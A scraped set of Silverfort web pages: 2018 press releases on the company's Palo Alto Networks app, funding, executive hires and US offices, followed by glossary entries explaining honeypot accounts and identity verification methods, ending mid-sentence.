productivity. Silverfort’s non-intrusive solution can protect systems that don’t support multi-factor authentication today, such as proprietary systems, IoT devices, shared files and folders, industrial control systems (ICS) and more. This allows organizations to secure corporate identities and critical assets, prevent data breaches and achieve compliance with regulations like GDPR, PCI and HIPAA By combining the powerful threat detection and prevention capabilities of Palo Alto Networks with Silverfort’s agentless authentication technology, this new app automatically enforces step-up authentication for suspicious users, based on real-time alerts from the Application Framework. When alerts are received, Silverfort provides suspected users a chance to prove their identity and continue to work, while effectively blocking malicious entities. The authentication results are provided as feedback to the Application Framework, allowing security teams to focus on actual threats and reduce false positives Watch A Live Demo of Silverfort Next-Gen Authentication Platform with the Palo Alto Networks Application Framework and Visit Silverfort at Ignite '18 Europe Cybersecurity Conference October 8-10, 2018, RAI Exhibition and Convention Center, Amsterdam QUOTES “We are excited to offer our mutual customers the ability to leverage the Silverfort Platform capabilities as part of the Palo Alto Networks Application Framework, making adaptive authentication smarter and more holistic than ever. By triggering step-up authentication and validating the user’s identity in response to network threats, Silverfort’s app helps companies achieve real-time threat prevention, while reducing productivity disruptions and minimizing false positive alerts. This joint offering enables continuous adaptive authentication with better accuracy and broader coverage, allowing organizations to deliver strong authentication across their entire networks. ” - Hed Kovetz, CEO and Co-Founder, Silverfort “We are thrilled to see the debut of third-party applications for our customers, and we welcome Silverfort to the Application Framework developer community. Together, we are fueling innovation in the cybersecurity market by completely changing the way that organizations test, deploy, and manage security. This important advancement will make organizations everywhere more secure and help protect our way of life in the digital age. ” - Lee Klarich, chief product officer, Palo Alto Networks AVAILABILITY The Silverfort Next-Gen Authentication Platform and App are available worldwide to customers, either from the Palo Alto Networks Application Framework or directly from Silverfort. The Palo Alto Networks Application Framework is now available worldwide to customers. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received world-wide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. To learn more visit our recognition section. --- - Published: 2018-09-05 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-expands-executive-leadership-team-drive-accelerated-growth-innovation/ Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet... Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet Growing Demand Boston, MA and Tel Aviv, Israel — September 5, 2018 — Silverfort, the provider of next-generation authentication solutions, today announced the appointment of top executives and industry experts who will help the company accelerate its growth and meet growing demand of its revolutionary authentication solution. Following its recent series A funding, Silverfort has appointed Dana Tamir as Vice President, Market Strategy, Ron Rasin, as Vice President, Product Management, Amir Boldo as Vice President, Engineering, and Rotem Zach as Vice President, Research. “Corporate networks have dramatically changed in recent years, creating new security challenges,” says Hed Kovetz, Silverfort’s CEO. “In order to protect our sensitive data and assets from unauthorized access, we must reinvent the way authentication and trust are implemented in our networks. We are redefining this space with a holistic approach which calls for an outstanding team. Dana, Ron, Amir and Rotem have the right industry experience and leadership to do just that. ” Dana Tamir brings over two decades of go-to-market excellence with a successful track record combining deep technical understanding with market vision and hands-on experience bringing new solutions to market. Prior to joining Silverfort Dana was Vice President, Marketing at Indegy. She also held a number of leadership roles at prominent cyber security companies including IBM Trusteer, Imperva, Symantec and Amdocs. Ron Rasin brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was Director of Product Management at Claroty, and held product management roles at Wix and NCR. Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces and holds a B. A. in Economics from Tel Aviv University. Amir Boldo joined Silverfort to lead its exceptional engineering team. He brings more than 15 years of industry experience and technology leadership. Prior to joining Silverfort, Amir served as Vice President, Innovation at DRIVENETS, where he led the development of cutting-edge cloud-based network products. He was also one of the first team members at Zerto, and led one of its core R&D teams. Amir served at the 8200 elite cyber unit of the Israel Defense Forces and received the unit’s excellence award. Rotem Zach was promoted to lead Silverfort’s research team, which tackles some of the most complex challenges in cybersecurity, cryptography and big data analytics. He joined Silverfort as one of the first employees, after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Silverfort was founded in 2016 and recently raised $11. 5 Million to deliver the next generation of authentication solutions. Already, customer and industry response has been very positive to Silverfort’s unique authentication platform, which enables adaptive multi-factor authentication across entire networks and cloud environments, and can protect all resources including those considered unprotectable until today. These executive additions will continue the forward momentum of the company. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received world-wide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. To learn more visit – silverfortcnt. wpengine. com Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 --- - Published: 2018-06-25 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-raises-11-5-million-series-enable-multi-factor-authentication-without-integration/ Silverfort’s revolutionary authentication platform delivers adaptive multi-factor authentication... Silverfort Raises $11. 5 Million in Series A to Deliver the Next Generation of Multi-Factor Authentication Silverfort’s revolutionary authentication platform delivers adaptive multi-factor authentication across entire enterprise networks and cloud environments without any modifications to endpoints and servers. Tel-Aviv, Israel and Boston, MA — June 25, 2018 — Silverfort, the first agentless multi-factor authentication provider, announced today a $11. 5 million Series A round. The new funding was led by TLV partners, with participation of the company’s early investors StageOne Ventures and Singtel Innov8. Silverfort will use the funds to address growing demand for its innovative authentication platform, which enables adaptive multi-factor authentication for sensitive assets without integration or loss of productivity. The company has customers across the financial, healthcare, energy, legal and technology industries, and formed strategic partnerships with top security vendors. Silverfort offers a unique authentication platform which seamlessly delivers adaptive multi-factor authentication across entire networks and cloud environments. This includes even systems that don’t support multi-factor authentication today, such as proprietary systems, IoT devices, shared files and folders, industrial control systems (ICS) and more. Silverfort’s patent-pending technology is non-intrusive and does not require deployment of software agents or inline gateways. It allows companies to secure corporate identities and critical assets, prevent data breaches and achieve compliance with regulations like GDPR, PCI and HIPAA without costly integration and without reducing productivity. “Dramatic changes in today’s enterprise environment, including IoT and cloud, create a new attack surface that calls for a new breed of authentication solutions,” said Shahar Tzafrir, Managing Partner at TLV Partners, who will be joining the Silverfort board. “Many security vendors offer multi-factor authentication solutions for modern web applications. But how do you apply the same protection to medical IoT devices, critical industrial systems, or shared folders that could be exposed to ransomware? And how do you deliver it across a hybrid or multi-cloud environment with thousands of virtual assets that are changing every day? Silverfort solves these problems for its customers by enabling strong authentication across all users, assets and environments in a unified, non-intrusive and seamless manner. The company has developed impressive patent-pending technology, built a very strong team, and is uniquely positioned to disrupt the authentication market. ” "We are excited to announce our Series A and to continue our growth with the support of such great investors," said Hed Kovetz, CEO and Co-Founder of Silverfort. "Our goal is to enable strong authentication across all enterprise assets without reducing productivity. Existing authentication solutions can no longer handle the scale, diversity and dynamic nature of today’s networks. With compromised credentials being leveraged in 81% of all data breaches, it is clear that these solutions must evolve. Silverfort introduces the next generation of authentication solutions, seamlessly enabling strong authentication everywhere without any modifications to endpoints and servers. We are receiving amazing reactions from the market and plan to use the new investment to meet this demand. ” On top of its unique authentication platform, Silverfort built a powerful AI-based policy engine. The platform’s broad coverage provides an important advantage – the ability to learn user behavior across all systems and environments, and to enforce adaptive authentication wherever needed with minimal impact on user experience. To further improve it, Silverfort integrates with leading 3rd party security products (for example, the recently announced partnership with Palo Alto Networks), and can trigger step-up authentication according to their alerts. These integrations enable real-time threat prevention without blocking legitimate users, therefore improving both security and productivity. Silverfort was founded in 2016 by Hed Kovetz, Matan Fattal and Yaron Kassner, a group of top cybersecurity and cryptography experts from the elite 8200 cyber unit of the Israeli Intelligence Corps, with substantial industry experience. Following the new investment, the company plans to expand its sales, marketing, security research and engineering teams in the US, Israel and Europe. For open positions, visit silverfort. com/careers. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received world-wide recognition and several industry awards, including: the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfort. com/contact. Contact: P: 646. 893. 7857 E: info@silverfort. pmco. co. il --- - Published: 2018-05-17 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-announces-new-partnership-palo-alto-networks/ Silverfort, which enables strong authentication... ANAHEIM, Calif. , May 22, 2018 — Silverfort, which enables strong authentication across entire corporate networks and cloud environments without any modifications to endpoints and servers, today unveiled its threat-driven multifactor authentication app for the Palo Alto Networks® (NYSE: PANW) Application Framework. By combining the powerful threat detection capabilities of Palo Alto Networks with Silverfort’s agentless authentication technology, the new app will automatically enforce step-up authentication for suspicious users, based on real-time alerts from the Palo Alto Networks Application Framework. Upon indication from the Palo Alto Networks Application Framework, Silverfort gives suspected users a chance to prove their identity and continue to work, while effectively blocking malicious entities. The results can be provided as feedback to the Palo Alto Networks Application Framework, allowing security teams to focus on actual threats and reduce false positives. Consuming cybersecurity innovations has become an arduous process. Organizations waste time deploying new sensors every time they want to collect a new piece of data and managing point products rather than improving security controls to stay ahead of attackers. The Palo Alto Networks Application Framework makes it easy to add new security capabilities quickly and efficiently. The framework extends the capabilities of the Palo Alto Networks Security Operating Platform, with a suite of APIs that developers can use to connect innovative apps with rich data, threat intelligence and enforcement points. Organizations gain immediate security value from apps developed by an open ecosystem of trusted innovators. Silverfort offers a unique authentication platform for enterprises, which enables multifactor authentication and adaptive AI-based authentication without requiring any modifications to endpoints and servers. Using patent-pending technology, Silverfort can apply multifactor authentication even for systems that don’t support it today, including proprietary systems, IoT devices, shared folders, critical infrastructure and more. Silverfort allows its customers to deliver strong authentication across large, dynamic environments, without deploying any software agents or inline gateways. QUOTES "Joining the Palo Alto Network Application Framework allows us to deliver unique value for our customers. When trying to handle large numbers of security alerts, it’s not always clear when to apply automatic prevention. While real-time prevention is important, it often results in blocking of legitimate users. As part of the Palo Alto Networks Application Framework, we will be able to trigger step-up authentication based on real-time security alerts, and help companies achieve real-time prevention without reducing the productivity of their legitimate users. " - Hed Kovetz, CEO and co-founder of Silverfort “We are delighted to welcome Silverfort to the Palo Alto Networks Application Framework developer community. The framework provides our customers with superior security through cloud-based apps developed by innovative security providers, large and small. Together, we are fueling innovation in the cybersecurity market with apps that are built rapidly, engineered on a common framework, and deliver unique value while solving our customers’ toughest security challenges. ” - Lee Klarich, chief product officer, Palo Alto Networks AVAILABILITY The Silverfort Authentication Platform is generally available, and the app will become available on the Palo Alto Networks Application Framework in August 2018. The Palo Alto Networks Application Framework is targeted for availability in August 2018 and will be available worldwide to customers who have purchased either Palo Alto Networks next-generation firewalls or Traps advanced endpoint protection and the Logging Service subscription. About Palo Alto Networks We are the global cybersecurity leader, known for always challenging the security status quo. Our mission is to protect our way of life in the digital age by preventing successful cyberattacks. This has given us the privilege of safely enabling tens of thousands of organizations and their customers. Our pioneering Security Operating Platform emboldens their digital transformation with continuous innovation that seizes the latest breakthroughs in security, automation, and analytics. By delivering a true platform and empowering a growing ecosystem of change-makers like us, we provide highly effective and innovative cybersecurity across clouds, networks, and mobile devices. About Silverfort Silverfort protects enterprises from data breaches by preventing credential compromise and misuse across the entire corporate network and cloud infrastructure. Silverfort leverages patent-pending technology to monitor and secure all user authentication, from any device to any resource. Silverfort seamlessly enhances the basic authentication and access mechanisms used by all client devices and services, instantly equipping them with the latest authentication and access protection technology without any change or integration. Contact us to learn more. Contact: P: 646. 893. 7857 E: info@silverfort. pmco. co. il --- - Published: 2018-02-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-expands-north-american-presence-new-offices-boston-houston/ Expansion enables Silverfort to strengthen its North American operations Silverfort Expands North American Presence with New Offices in Boston and Houston Expansion enables Silverfort to strengthen its North American operations TEL AVIV, Israel, — Jan. 02, 2018 — Silverfort Inc. , which offers a unique solution for delivering adaptive AI-based authentication across the entire corporate network and cloud without any change to endpoints and servers, announced today it is opening two new U. S. offices in Boston and Houston. Both offices will increase the company's footprint in North America by supporting its overall growth strategy. In addition to the company’s headquarters in Tel Aviv, the new offices will serve the sales team across North America and facilitate new hires across all departments, expanding the sales team and establishing new partner channels. “The decision to open these new offices is part of our growth plan in the United States,” said Hed Kovetz, CEO of Silverfort. “Due to the growing need and challenges of applying strong authentication for a variety of corporate systems, applications and IoT devices, Silverfort is gaining a lot of interest for its innovative authentication platform, which can protect all those resources without integration. ” Silverfort’s patent-pending technology enables multifactor authentication and adaptive authentication (based on its AI engine) throughout an entire organization’s network, including all types of on-prem and cloud-based resources. Silverfort’s platform automatically secures every physical and virtual resource in a cost-effective manner that demonstrates several unique features: Patent-pending technology keeps track of which user is accessing which resource from which device at which time, across the entire corporate network and cloud infrastructure. Based upon an organization’s policies and Silverfort’s risk analysis engine, Silverfort enforces proactive protection measures to verify the user’s identity and deny access if required. Silverfort’s advanced AI-based policy engine analyzes all authentication and access activity across the organization, and enforces proactive protection measures to verify the user’s identity and deny access, if needed. Silverfort’s unparalleled coverage assures holistic protection and accurate AI-based policy decisions. Silverfort can even protect resources that don’t support strong authentication at all, including infrastructure, IoT devices, proprietary systems and all types of servers and workstations. Silverfort is managed from a centralized platform, without requiring any integration with individual endpoints and servers, and without installing agents or in-line gateways. This is achieved by seamlessly adding protection layers over the existing authentication protocols, using patent-pending technology. Based on its recent analysis of the Authentication and Access Management in Critical National Infrastructure market, Frost & Sullivan recognized Silverfort with its 2017 New Product Innovation Award. For more information, visit silverfortcnt. wpengine. com About Silverfort Silverfort protects enterprises from data breaches by preventing credential compromise and misuse across the entire corporate network and cloud infrastructure. Silverfort leverages patent-pending technology to monitor and secure all user authentication, from any device to any resource. Silverfort seamlessly enhances the basic authentication and access mechanisms used by all client devices and services, instantly equipping them with the latest authentication and access protection technology without any change or integration. Contact us to learn more. Contact: P: 646. 893. 7857 E: info@silverfort. pmco. co. il --- --- ## Glossary - Published: 2024-12-04 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/honeypot-account/ A decoy user account planted in a system solely to entice attackers and instantly alert the security team when accessed, enabling early breach detection. Honeypot accounts are fake user accounts created within an organization's system with the sole purpose of attracting and alerting security teams of malicious activity. When an attacker attempts to access one of these accounts, it triggers an immediate alert to the SOC, enabling a swift response to potential threats. Differentiating Honeypot Accounts, Honeypots, and Honeypot Tokens Honeypot Accounts: These are decoy user accounts embedded within a system. They appear legitimate and blend seamlessly with real user accounts but have no actual purpose other than to serve as bait for attackers. Any interaction with a Honeypot account is inherently suspicious and indicates a possible security breach. Honeypots: Honeypots are entire systems or networked resources configured to attract cybercriminals. They mimic legitimate systems to lure attackers away from valuable assets and allow security teams to observe and analyze the tactics and techniques used by the intruders. Honeypot Tokens: These are small pieces of data, such as fake API keys, database entries, or documents, embedded within a network. When accessed, they send alerts to the security team, indicating a potential breach. By using Honeypot accounts, organizations can create a more nuanced and layered security strategy. These accounts provide an effective early warning system, highlighting unauthorized access attempts before attackers can cause significant harm. Advantages of Honeypot Accounts Honeypot accounts offer a unique set of advantages that enhance an organization’s cybersecurity defenses by providing early detection of unauthorized access and reducing false positives. Here are the key benefits of implementing Honeypot accounts: Less False Positives Honeypot accounts are designed to be unused by legitimate users, meaning there is no legitimate reason for anyone to access them. Therefore, any interaction with these accounts is immediately flagged as suspicious. This specificity helps in avoiding false positives, a common issue with other security measures, thereby allowing security teams to focus on genuine threats. Rapid Detection of Unauthorized Access The moment an attacker tries to access a Honeypot account, an alert is triggered, enabling the security team to respond quickly. This rapid detection is crucial for mitigating potential damage and stopping the attacker before they can access sensitive data or disrupt operations. Easy Integration and Maintenance Setting up and maintaining Honeypot accounts is relatively straightforward. They can be seamlessly integrated into existing security infrastructures without significant overhead. Honeypot accounts do not require special hardware or complex configurations, making them an efficient and cost-effective addition to the security toolkit. These advantages highlight why Honeypot accounts are becoming an increasingly popular tool in the cybersecurity landscape. They provide a clear, actionable signal of unauthorized activity, allowing for swift and effective responses. Setting Up Honeypot Accounts Creating Honeypot accounts involves a series of strategic steps to ensure they are effective in detecting unauthorized access attempts while blending seamlessly into the existing user environment. Here’s a step-by-step guide on how to set up Honeypot accounts: Identify Target Location Determine where the Honeypot account will be most effective. This could be within a financial database, user directory, or any other sensitive part of the system. The location should be strategically chosen to appear attractive to potential attackers. Create the Account Select a username and other details that appear realistic and blend in with genuine accounts. Avoid obvious names like "Honeypot_account" or "fakeuser01. " Instead, use common naming conventions used within your organization. Set Permissions Assign permissions that make the account look valuable to attackers. These permissions should suggest high-level access but must not grant actual access to sensitive data. For example, label permissions as "admin" or "finance_manager" without real privileges. Configure Alerts Integrate the Honeypot account with your security monitoring tools. Set up alerts to be triggered for any activity related to this account. Use tools like Security Information and Event Management (SIEM) systems to automate and manage these alerts. Test the Setup Before deploying, thoroughly test the Honeypot account to ensure that alerts are triggered correctly and notifications are sent to the appropriate team members. This helps in verifying that the setup works as intended. Monitor Continuously Once deployed, continuously monitor the Honeypot account for any activity. Regular monitoring helps in early detection of any unauthorized attempts and allows for timely responses. Review and Update Regularly review the settings and details of the Honeypot account. Update them as necessary to keep up with evolving threats. This could involve changing account details, permissions, or even relocating the account to a different part of the system. Enhancing Honeypot Account Effectiveness To maximize the effectiveness of Honeypot accounts, they must appear indistinguishable from legitimate user accounts. Here are several best practices and advanced strategies to enhance the realism and efficacy of Honeypot accounts: Tips for Making Honeypot Accounts Look Legitimate Use Realistic Names and Profiles Select names that blend in with your organization’s existing user accounts. Avoid using obvious or generic names that could tip off an attacker. For example, instead of "fakeuser01," use a common naming convention like "j. doe" or "s. johnson. " Grant Attractive Permissions Assign permissions that suggest the account holds significant access, such as administrative or managerial roles. This makes the account more appealing to attackers. However, these permissions should be designed to appear valuable without providing actual access to sensitive systems or data. Associate Attractive Data Link the Honeypot account to fake but seemingly valuable data. This could include dummy financial records, internal memos, or project documents. The idea is to create the illusion that the account has access to important information. Place Accounts in Multiple Locations Distribute Honeypot accounts throughout various parts of your network to cover multiple potential entry points and attack vectors. This increases the likelihood of detecting unauthorized access attempts across different system segments. Periodic Changes Regularly update the details and settings of your Honeypot accounts. This includes changing usernames, passwords, and associated permissions. Periodic updates help in keeping the accounts effective and prevent them from being easily detected by attackers over time. Prefer Aged Accounts Repurpose old, inactive accounts instead of creating new ones. An account that has been in the system for several years appears more legitimate than a newly created one. Ensure these accounts are aged appropriately within your Active Directory (AD) environment. Scheduled Logins Configure scheduled tasks to log in to the Honeypot account periodically. This adds a layer of legitimacy, as completely inactive accounts can raise suspicion. Regular logins can make the account seem actively used. Password Management Ensure the Honeypot account's password policies align with those of other accounts. If most accounts require periodic password changes, set similar policies for the Honeypot account to avoid raising red flags. Bad Password Attempts Configure the Honeypot account to have occasional bad password attempts logged. Real users often make mistakes when entering passwords, and replicating this behavior can enhance the account's authenticity. Associate with Real User Accounts If the Honeypot account is designed to look like an administrative or service account, ensure it has an associated user account that appears active. This can prevent attackers from easily identifying the account as a decoy. Common Use Cases and Examples Honeypot accounts have been employed successfully across various industries to enhance security measures and provide early warnings of potential breaches. Here are some common use cases and examples illustrating their effectiveness: Financial Institutions In the financial sector, Honeypot accounts can be set up within customer databases and internal financial systems. For example, a Honeypot account labeled as a high-level finance manager might be created. This account would be linked to fake financial records or internal transfer permissions, making it an attractive target for attackers looking to access sensitive financial data. Upon any interaction with this account, security teams receive immediate alerts, allowing them to investigate and respond swiftly. Enterprise Environments Large enterprises often deal with numerous user accounts and varying levels of access. Honeypot accounts can be strategically placed within internal user directories, particularly in areas with high-value information such as HR databases or executive communication channels. By monitoring these accounts, enterprises can detect insider threats or unauthorized attempts to access privileged information. Healthcare Systems Healthcare organizations can use Honeypot accounts within their electronic health record (EHR) systems. For instance, a Honeypot account might be set up as a senior doctor with access to sensitive patient records. If an attacker attempts to breach this account, it triggers an alert, helping to protect patient privacy and sensitive health data. Government Agencies Government agencies, which often deal with highly sensitive and classified information, can implement Honeypot accounts within their internal networks. These accounts can be designed to look like high-level administrative accounts with access to classified documents. Any unauthorized attempt to access these accounts can alert security teams to potential espionage or insider threats. Example Scenario: Detection of Unauthorized Access Consider a scenario where an IT department of a large corporation sets up a Honeypot account named "admin_j. smith" with permissions that suggest it has access to critical systems. The account is placed in an area of the network where attackers are likely to search for high-value targets. One day, an alert is triggered indicating that someone attempted to log in to "admin_j. smith" from an unusual IP address. The security team investigates and discovers that the IP address is associated with a known threat actor. By detecting this attempt early, the organization can take steps to mitigate the threat and secure its network before any real damage occurs. Integration with Cybersecurity Strategies Effectively integrating Honeypot accounts into a broader cybersecurity strategy involves more than just their setup and deployment. To maximize their potential, these accounts must work in tandem with existing security tools and protocols. Here are key considerations and best practices for integrating Honeypot accounts into your overall cybersecurity framework: Real-Time Monitoring and Alert Systems Security Information and Event Management (SIEM) Systems: SIEM platforms are essential for consolidating and analyzing security alerts. By integrating Honeypot accounts with SIEM systems, organizations can automate the monitoring process and ensure that any interaction with a Honeypot account triggers an immediate alert. Popular SIEM solutions like Splunk, IBM QRadar, and ArcSight can be configured to monitor Honeypot account activities and provide real-time notifications. Intrusion Detection and Prevention Systems (IDS/IPS): Honeypot accounts should be connected to IDS/IPS tools to detect and prevent malicious activities. These systems can identify patterns and behaviors associated with unauthorized access attempts, providing another layer of defense. Incident Response Planning Developing an Incident Response Plan: Having a clear and well-documented incident response plan is crucial for dealing with alerts triggered by Honeypot accounts. This plan should outline the steps to be taken when an alert is received, including isolating affected systems, conducting a forensic analysis, and communicating with relevant stakeholders. Automated Responses: Leverage automation to streamline the response process. For instance, tools like SOAR (Security Orchestration, Automation, and Response) can help automate certain aspects of the incident response, such as blocking suspicious IP addresses or disabling compromised accounts. Regular Review and Adaptation Periodic Assessments: Regularly review the effectiveness of Honeypot accounts and their integration with your security infrastructure. This includes analyzing alert patterns, false positives, and any changes in attack methods. Continuous assessment helps in fine-tuning the setup and improving detection capabilities. Adapt to Evolving Threats: Cyber threats are constantly evolving, and so should your Honeypot account strategy. Stay informed about the latest attack techniques and update your Honeypot accounts and associated configurations accordingly. This might involve changing account details, permissions, or even creating new Honeypot accounts in different parts of the system. Leveraging Advanced Security Platforms Specialized Tools and Platforms: Consider using advanced security platforms that offer specialized features for managing Honeypot accounts. For example, CrowdStrike Falcon provides robust identity protection and can automate the setup, monitoring, and response processes for Honeypot accounts. Such platforms enhance the overall efficiency and effectiveness of your security operations. Collaboration with Security Experts: Engage with cybersecurity experts and vendors who can provide insights and best practices for deploying and managing Honeypot accounts. This collaboration can help in optimizing the use of Honeypot accounts within your organization’s specific context. Potential Challenges and Mitigation While Honeypot accounts are powerful tools... --- - Published: 2024-07-08 - Modified: 2025-08-21 - URL: https://www.silverfort.com/glossary/identity-verification/ The process of validating that an individual is who they claim to be, often through document checks, biometrics, knowledge-based methods, or multifactor authentication, to prevent fraud and ensure secure access. Identity verification is the process of confirming that an individual is who they claim to be. Today, this process is essential in various domains, where transactions and interactions often occur remotely. It ensures that only authorized individuals can access services, execute tasks, and access sensitive information. The primary purpose of identity verification is to enhance security, prevent unauthorized identity, and comply with regulatory requirements. Accurate identity verification is critical in sectors such as finance, healthcare, and e-commerce, where the risk of identity theft and fraud is high. By confirming identities accurately, organizations can protect themselves and their customers from malicious activities, ensure compliance with laws such as Know Your Customer (KYC) and Anti-Money Laundering (AML) regulations, and build trust with their users. Methods of Identity Verification Document Verification Traditional document verification involves checking government-issued documents such as passports, driver’s licenses, or ID cards. This method relies on human inspectors to visually verify the authenticity of the documents and the identity of the holder. Despite its common use, this approach is prone to human error and bias, and can be vulnerable to sophisticated forgery techniques. Additionally, it is time-consuming and lacks the scalability needed for handling high volumes of verifications, particularly in a digital context . In-Person Verification In-person verification requires individuals to physically present themselves at a verification center. An official then confirms their identity by comparing them to the provided identification documents. While this method can be highly accurate, it is logistically challenging and impractical for digital-first operations, as it cannot scale to meet the demands of remote or online transactions ID Document Verification Digital ID document verification uses advanced technologies such as artificial intelligence (AI) and optical character recognition (OCR) to verify the authenticity of uploaded identification documents and match selfies with ID photos. This method is widely used by financial institutions during client onboarding. By automating the verification process, it enhances accuracy and efficiency, reduces the potential for human error, and supports remote verification Knowledge-Based Authentication (KBA) Knowledge-based authentication involves users answering personal security questions based on historical data. This method is often used for account recovery processes, such as when a user forgets their email password. While this method provides an additional security layer, it can be vulnerable if compromised credentials are used. Biometric Authentication Biometric authentication leverages unique physical characteristics such as fingerprints, facial recognition, voice patterns, and iris scans to verify identities. Commonly used in smartphones and high-security environments, biometrics offer a high level of security because they are difficult to forge. However, they raise privacy concerns and require robust data protection measures to secure biometric data Database Methods Database methods involve cross-referencing user-provided information with authoritative databases. Examples include email and phone verification, where users receive a verification code to confirm their identity, and social verification, where users' identities are validated through their social media accounts. These methods are efficient and scalable, making them ideal for online platforms Multi Factor Authentication (MFA) Multi Factor authentication combines multiple verification factors, such as passwords, biometrics, and one-time passwords, to enhance security. By requiring multiple proofs of identity, MFA provides robust protection against unauthorized access and is widely adopted across various digital services Behavioral Analysis Behavioral analysis verifies user identities by analyzing their behavior patterns, such as typing speed, mouse movements, and interaction styles. This method can also consider environmental factors like location and device usage. Behavioral analysis provides a low-friction and often invisible verification process, enhancing security without disrupting the user experience. These methods collectively strengthen identity verification processes by addressing the limitations of traditional techniques and leveraging technological advancements to enhance security and user experience. Use Cases of Identity Verification Identity verification is crucial across various sectors to ensure security, prevent fraud, and comply with regulatory requirements. Financial Services In the financial sector, identity verification is integral to activities such as opening bank accounts, applying for loans, and executing financial transactions. Banks and financial institutions are required to comply with Know Your Customer (KYC) regulations to prevent money laundering and other financial crimes. Verifying the identity of customers ensures that only legitimate individuals can access financial services, protecting both the institution and the customer from fraud and unauthorized access . E-commerce E-commerce platforms rely on identity verification to secure user accounts and transactions. During account creation, verifying the user's identity helps prevent the creation of fraudulent accounts. During transactions, it ensures that the person making the purchase is indeed the account holder, thus reducing the risk of fraud and unauthorized transactions. This process is crucial for maintaining trust and security in online shopping environments . Healthcare In healthcare, identity verification ensures that sensitive medical information is accessed only by authorized individuals. This is vital for protecting patient privacy and maintaining the integrity of medical records. For healthcare providers, verifying the identity of patients and healthcare professionals helps ensure that treatments and services are administered correctly and securely . Government Services Government services also require robust identity verification processes. These are used for validating identities for access to various public services, benefits, and online tax filings. Accurate identity verification prevents fraud and identity theft, ensuring that services and benefits are provided to the right individuals. It is also essential in processes like voter registration and online voting, where verifying the identity of participants is crucial for the integrity of the electoral process . Corporate Sector In the corporate world, identity verification is critical for employee onboarding and access management. Verifying the identities of new hires ensures that only legitimate individuals are granted access to company resources. Ongoing verification helps manage access to sensitive systems and data, protecting the company from internal threats and unauthorized access. This process is essential for maintaining data security and operational integrity within organizations . These use cases demonstrate the wide-ranging applications and importance of identity verification across different sectors, highlighting its role in enhancing security, compliance, and trust. Challenges in Identity Verification Fraud and Forgery One of the primary challenges is the potential for fraud and document forgery. Cybercriminals are adept at creating fake documents that can pass initial inspections, especially if the verification process relies on traditional methods. Advanced forgery techniques and the increasing availability of high-quality fake IDs make it challenging to ensure the authenticity of user identities. This is compounded by the sophistication of fraudulent schemes, which can exploit vulnerabilities in the verification process (Identity) (DocuSign) . Human Error and Bias Another significant challenge is human error and bias in the verification process. Manual inspections are prone to mistakes, as even experienced verifiers can miss subtle signs of tampering or forgery. Additionally, human biases can affect judgment, leading to inconsistencies and potential misidentifications. These errors can undermine the reliability of the verification process and pose security risks. Privacy Concerns Balancing the need for thorough identity verification with privacy concerns is crucial. Users are increasingly aware of their privacy rights and are concerned about the amount of personal information they must share for verification purposes. Organizations must ensure that they collect and handle user data responsibly, complying with privacy regulations such as GDPR and CCPA. Failure to protect user data can lead to breaches, damaging trust and exposing users to further risks . Scalability Scalability is another challenge, particularly for organizations dealing with high volumes of user identities. Traditional verification methods often struggle to keep up with the demand, leading to delays and bottlenecks. This is especially problematic in sectors like e-commerce and finance, where quick and seamless user verification is critical for maintaining user satisfaction and operational efficiency . Integration with Digital Systems Integrating identity verification processes with existing digital systems can be complex. Many traditional methods are not designed for seamless integration with modern digital platforms, creating friction and slowing down processes. Organizations need to ensure that their verification systems are compatible with their digital infrastructure to provide a smooth user experience and maintain operational efficiency . Best Practices for Implementing Identity Verification In the realm of cybersecurity, securing user identities is paramount. Effective implementation of identity verification processes and tools ensures robust protection against fraud and unauthorized access. Here are the best practices: Clear Communication Organizations should clearly communicate the requirements and procedures for identity verification to users. Transparent and straightforward instructions help users understand what is expected, reducing errors and enhancing the verification process. Clear communication fosters user trust, as they feel informed and confident about the security measures in place. Data Protection Protecting user data is critical. Implementing strong encryption, access controls, and secure storage solutions ensures that personal information collected during the verification process is safeguarded against breaches and unauthorized access. Compliance with privacy regulations such as GDPR and CCPA is essential to maintaining user trust and avoiding legal penalties . Consistent Support Providing consistent 